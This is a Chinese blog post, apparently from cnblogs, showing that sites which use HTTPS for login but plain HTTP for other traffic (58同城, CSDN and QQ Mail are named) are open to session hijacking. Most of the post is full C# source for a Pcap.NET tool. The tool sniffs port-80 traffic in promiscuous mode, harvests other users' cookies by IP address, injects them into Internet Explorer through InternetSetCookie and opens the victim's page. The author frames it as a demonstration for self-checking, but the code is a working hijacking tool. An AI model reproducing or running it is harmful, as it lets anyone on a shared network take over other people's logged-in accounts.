58 同城的用户登录是采用了 HTTPS 的,仍然逃不过会话劫持。大部分较规范的网站,都是类似模式:登录采用 HTTPS,主要流量走 HTTP。
随手测试发现,使用该模式的站点,包括 csdn、qq 邮箱(是的它竟然还有 http 版的)等等,很多都未做到会话劫持免疫。博客园其实也中招了,但它把敏感操作都放到了 HTTPS,所以没太多影响。
其实,对于用 HTTP 走流量、HTTPS 走认证的站点,略施改造,是可以对会话劫持免疫的。各大网站可以自行下载我的程序自查是否存在缺陷,我可以提供针对性免疫补丁支持。
以下是该示例的主要代码,蛮简单,引用了 Pcap.NET 组件,需要对应安装 WinPcap。基于该组件的网络数据包嗅探,只是做会话劫持的一种途径,而且有应用局限性,所以示例代码更多是一个演示程序而非黑客工具。下面会具体讲到。
想跟进最新代码的还请 watch 我 github 上源码:https://github.com/baibaomen/Baibaomen.HttpHijacker
- using PcapDotNet.Core;
- using PcapDotNet.Packets;
- using System;
- using System.Collections.Concurrent;
- using System.Collections.Generic;
- using System.Diagnostics;
- using System.Linq;
- using System.Runtime.InteropServices;
- using System.Text;
- using System.Threading.Tasks;
- using System.Windows.Forms;
- namespace Baibaomen.HttpHijacker
- {
- public partial class FormHijacker : Form
- {
- /// <summary>
- /// 被嗅探到的各个设备的cookie集合。
- /// </summary>ConcurrentDictionary<string, ConcurrentDictionary<string,string>> clientCookies =newConcurrentDictionary<string, ConcurrentDictionary<string,string>>();
- public FormHijacker()
- {
- InitializeComponent();
- }
- private voidFormHijacker_Load(object sender, EventArgs e)
- {
- StartHijack();
- }
- public void StartHijack()
- {
- Task.Run(delegate {
- IList allDevices = LivePacketDevice.AllLocalMachine;
- if(allDevices.Count ==0)
- {
- MessageBox.Show("未找到网卡。请确认已安装WinPcap。");
- return;
- }
- foreach(varselectedDevicein allDevices)
- {
- Task.Run(delegate
- {
- PacketCommunicator communicator =
- selectedDevice.Open(65536, PacketDeviceOpenAttributes.Promiscuous,1000);
- if(communicator.DataLink.Kind != DataLinkKind.Ethernet)
- {
- return;
- }
- using(BerkeleyPacketFilter filter = communicator.CreateFilter("tcp and dst port 80"))
- {
- communicator.SetFilter(filter);
- }
- communicator.ReceivePackets(0, PacketHandler);
- });
- }
- this.BeginInvoke(newEventHandler(delegate {
- lbMsg.Text ="监听已启动";
- }));
- });
- }
- private void PacketHandler(Packet packet)
- {
- try
- {
- varsourceIP = packet.Ethernet.IpV4.Source.ToString();
- varhttp = packet?.Ethernet?.IpV4?.Tcp.Http;
- if(http ==null|| http.Header ==null)return;
- if(http.IsRequest && http.IsValid)
- {
- String msg = http.Decode(Encoding.UTF8);
- //只截获网页正文请求。
- if(!string.IsNullOrEmpty(msg))
- {
- varlines = msg.Split(new string[] {"\r\n" }, StringSplitOptions.RemoveEmptyEntries);
- varhost = lines.FirstOrDefault(x => x.StartsWith("Host: "))?.Substring("Host: ".Length);
- varcookie = lines.FirstOrDefault(x => x.StartsWith("Cookie: "))?.Substring("Cookie: ".Length);
- if(string.IsNullOrEmpty(host))return;
- if(!string.IsNullOrEmpty(cookie))
- {
- varcCookies = clientCookies.GetOrAdd(sourceIP,newConcurrentDictionary<string,string>());
- cCookies.AddOrUpdate(host, cookie, (key, oldVal) => cookie);
- }
- if(msg.StartsWith("GET ") && (msg.Contains("\nAccept: text/html") || msg.Contains("\nAccept: text/plain")))//筛除对资源文件等的请求,让数据更干净。
- {
- varpathAndQuery = lines[0].Substring(0, lines[0].LastIndexOf(" HTTP/")).Substring("GET ".Length);
- this.BeginInvoke(newEventHandler(delegate {
- lstSessions.Items.Insert(0, $"{sourceIP}\t{DateTime.Now}\thttp://{host + pathAndQuery}");
- }));
- }
- }
- }
- }
- catch//可能嗅探数据不完整,丢弃。
- {
- }
- }
- [DllImport("wininet.dll", CharSet = CharSet.Auto, SetLastError =true)]
- public static extern boolInternetSetCookie(stringlpszUrlName,stringlbszCookieName,string lpszCookieData);
- private voidbtnHijack_Click(object sender, EventArgs e)
- {
- varselected = lstSessions.SelectedItem;
- if(selected ==null)
- {
- MessageBox.Show("请选择待劫持会话");
- return;
- }
- varsegments = selected.ToString().Split('\t');
- varip = segments[0];
- varurl = segments[2];
- varcookies = clientCookies[ip];
- foreach(vardomainCookieincookies)//将cookie设置为浏览的cookie
- {
- foreach(varitemindomainCookie.Value.Split(';'))
- {
- try
- {
- varname = item.Substring(0, item.IndexOf('=')).Trim();
- varvalue = item.Substring(item.IndexOf('=') +1);
- InternetSetCookie(
- "http://"+ domainCookie.Key,
- name,
- value +";expires="+ DateTime.UtcNow.AddMinutes(10).ToString("R"));
- }
- catch{ }//有不符合格式的数据。可能嗅探数据不完整,丢弃。
- }
- }
- if(lstSessions.SelectedItem !=null)
- {
- Process.Start("iexplore.exe", url);
- }
- }
- }
- }
来源: http://www.cnblogs.com/baibaomen/p/http-session-hijack.html